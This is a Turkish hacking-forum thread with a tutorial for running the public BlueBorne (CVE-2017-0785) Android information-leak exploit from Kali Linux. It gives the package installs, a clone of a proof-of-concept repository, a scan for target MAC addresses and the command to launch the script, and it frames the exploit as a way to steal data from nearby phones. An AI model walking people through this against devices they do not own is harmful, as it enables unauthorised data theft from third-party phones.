Blueborne [CVE-2017-0785] Exploit |Android Bellek Sızıntısı| Ar-Ge Kulübü | Sports16

sports16

sports16

Katılımcı Üye
11 May 2014
916
2
Chmod 777
jyo2qm.png

Merhabalar, bu konumda Türkçe anlatım olarak hiçbir sitede bulunmayan Blueborne exploiti anlatacağım.



1-BlueBorne Exploit Ne İşe Yarar? Neleri Etkiler?

2-BlueBorne Exploit İçin Gerekli Olan Paketleri Yükleme.

3-BlueBorne Exploit Yükleme.

4-Örnek BlueBorne Exploit Saldırısı.



BlueBorne Exploit Ne İşe Yarar? Neleri Etkiler ?:

logo-blueborne.png



Bilgisayar korsanlarının Bluetooth bağlantısını kullanarak karşıdaki telefon veya bilgisayar üzerinden veri çalmasına olanak sağlar.Android ve Tizenin yanı sıra Windows ve OS X de dahil olmak üzere Linux-Kernel temelli işletim sistemlerini de etkileyebilmektedir.



BlueBorne Exploit İçin Gerekli Paketleri Yükleme
unknown.png

Gerekli paketleri yüklemek için kali linux terminali açıyoruz ve terminalden paketlerimizi yüklüyoruz.



1- Libbluetooth-dev

Kod:
sudo apt-get install bluetooth libbluetooth-dev

Terminale yukarıdaki komutu yazıp enter tuşuna basıyoruz ve gelen soruya Y diyoruz.İlk paketimiz yüklenmiş oldu.



2- Pybluez

Kod:
sudo pip install pybluez

Terminale yukarıdaki komutu yazıp enter tuşuna basıyoruz ve paketimiz yükleniyor.



3-Pwntools

Kod:
sudo pip install pwntools

Terminale yukarıdaki komutu yazıp enter tuşuna basıyoruz ve son paketimizide yüklemiş oluyoruz.




BlueBorne Exploit Yükleme

Kali Linux terminali açıyoruz.

Kod:
git clone GitHub - ojasookert/CVE-2017-0785: Blueborne CVE-2017-0785 Android information leak vulnerability

Terminale yukarıdaki komutu yazıp BlueBorne Android Exploitimizi indiriyoruz.



Şimdi ise exploitimize yürütme izni vermemiz gerekiyor.Yürütme iznini nasıl verdiğimizi resimde anlattım.

BlueBorne Exploit Saldırısı


1-Hedef MAC Adresine Ulaşma


Kod:
hcitool scan

Mac adresine ulaşmak için hcitool kullanılabilir bunun için yukarıdaki komutu kullanabiliriz.

2-BlueBorne Exploiti Çalıştırma


Kod:
python CVE-2017-785.py TARGET= "MACADRESİ"

Exploiti çalıştırmak için yukarıdaki komutu kullanacağız.

Farklı işlemler yapmak için


Kod:
help

yukarıdaki help komutunu kullanabiliriz.


Konumuz buraya kadar.Anlatım tamamen bana aittir.Çok önemli olmasına rağmen bu exploit hakkında hiçbir sitede türkçe kaynak bulunmamaktadır/bulamadım.Umarım anlaşılır bir şekilde anlatabilmişimdir.Sağlıcakla kalın.

Telefondan Düzenleme: Telefonunuzda blueborne açığının olup olmadığını öğrenmek için Google Play'den blueborne scanner programını indirip telefonunuzu tarayıp öğrenebilirsiniz.
 
Moderatör tarafında düzenlendi:
sports16

sports16

Katılımcı Üye
11 May 2014
916
2
Chmod 777
Son düzenleme:
Ccelalcan

Ccelalcan

Katılımcı Üye
1 Eyl 2014
620
0
/@fsociety
Mac adresini bildiğimiz herhangi bir mobil cihaza yapabiliyormuyuz bunu ? yoksa aynı ağda falan mı olmamız lazım ?
 
sports16

sports16

Katılımcı Üye
11 May 2014
916
2
Chmod 777
TeamRound' Alıntı:
Eline SAĞLIK
Genişletmek için tıkla ...
Teşekkür ederim.

kenzai' Alıntı:
Yararlı konu emeklerinize sağlık.
Genişletmek için tıkla ...
Teşekkür ederim.

Slyfer' Alıntı:
Detaylı ve yararlı olmuş, elinize sağlık
Genişletmek için tıkla ...
Elimden geldiği kadarıyla detaylı anlatmaya çalıştım.Teşekkur ederim.
canuhelpme1827' Alıntı:
Eline Emeğine sağlık işime yarar bi konu :)
Genişletmek için tıkla ...
Teşekkür ederim.Umarım işinize yarar.
 
Son düzenleme:
B

Blue Hacker

Üye
10 Ara 2009
244
0
peki o help komutundan sonraki gelen komutlar ne işe yarıyorki o kısmı nasıl kullanacağız çok yabancı geldi bana o kısım cihazı exploitledik diyelim ne komutu gireceğiz buraya ?
 
Ccelalcan

Ccelalcan

Katılımcı Üye
1 Eyl 2014
620
0
/@fsociety
Dostum senden kişisel bir ricam var, Exploiti kullandım ancak sadece help komutu ile karşımıza çıkan komutları nasıl kullanacağımızı anlamadım. Komutları nasıl kullanacağımızı da anlattığın bir konu açarsan tadından yenmez. İyi forumlar..
 
sports16

sports16

Katılımcı Üye
11 May 2014
916
2
Chmod 777
Blue Hacker' Alıntı:
peki o help komutundan sonraki gelen komutlar ne işe yarıyorki o kısmı nasıl kullanacağız çok yabancı geldi bana o kısım cihazı exploitledik diyelim ne komutu gireceğiz buraya ?
Genişletmek için tıkla ...

Bilgisayarım şuan kullanılamaz durumda en yakın zamanda bilgisayara geçtiğimde komutların kullanımını anlatan bir yazı yazacağım.Teşekkür ederim.

Ccelalcan' Alıntı:
Dostum senden kişisel bir ricam var, Exploiti kullandım ancak sadece help komutu ile karşımıza çıkan komutları nasıl kullanacağımızı anlamadım. Komutları nasıl kullanacağımızı da anlattığın bir konu açarsan tadından yenmez. İyi forumlar..
Genişletmek için tıkla ...

Bilgisayarım şuan kullanılamaz durumda en yakın zamanda bilgisayara geçtiğimde komutların kullanımını anlatan bir yazı yazacağım.Teşekkür ederim.
 
lealperen

lealperen

Üye
30 Haz 2018
73
0
Aydın
Ne kadar yaygın olduğunu görmek şaşırtıcı :) Bunu ve bir başka blueborne exploitini kullanaraktan telefona shell bile atabiliyorduk sanırım.
 
karazafer_

karazafer_

Kıdemli Üye
11 Ağu 2009
2,267
4
System32
help komutu yanlız başına kullanılırsa komut satırının komutlarını gösterir. Yanlış bilgi vermeyin millete. Gösterdiğin exploitte sadece açık varmı yokmu kontrol amaçlı bır test scripti.
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.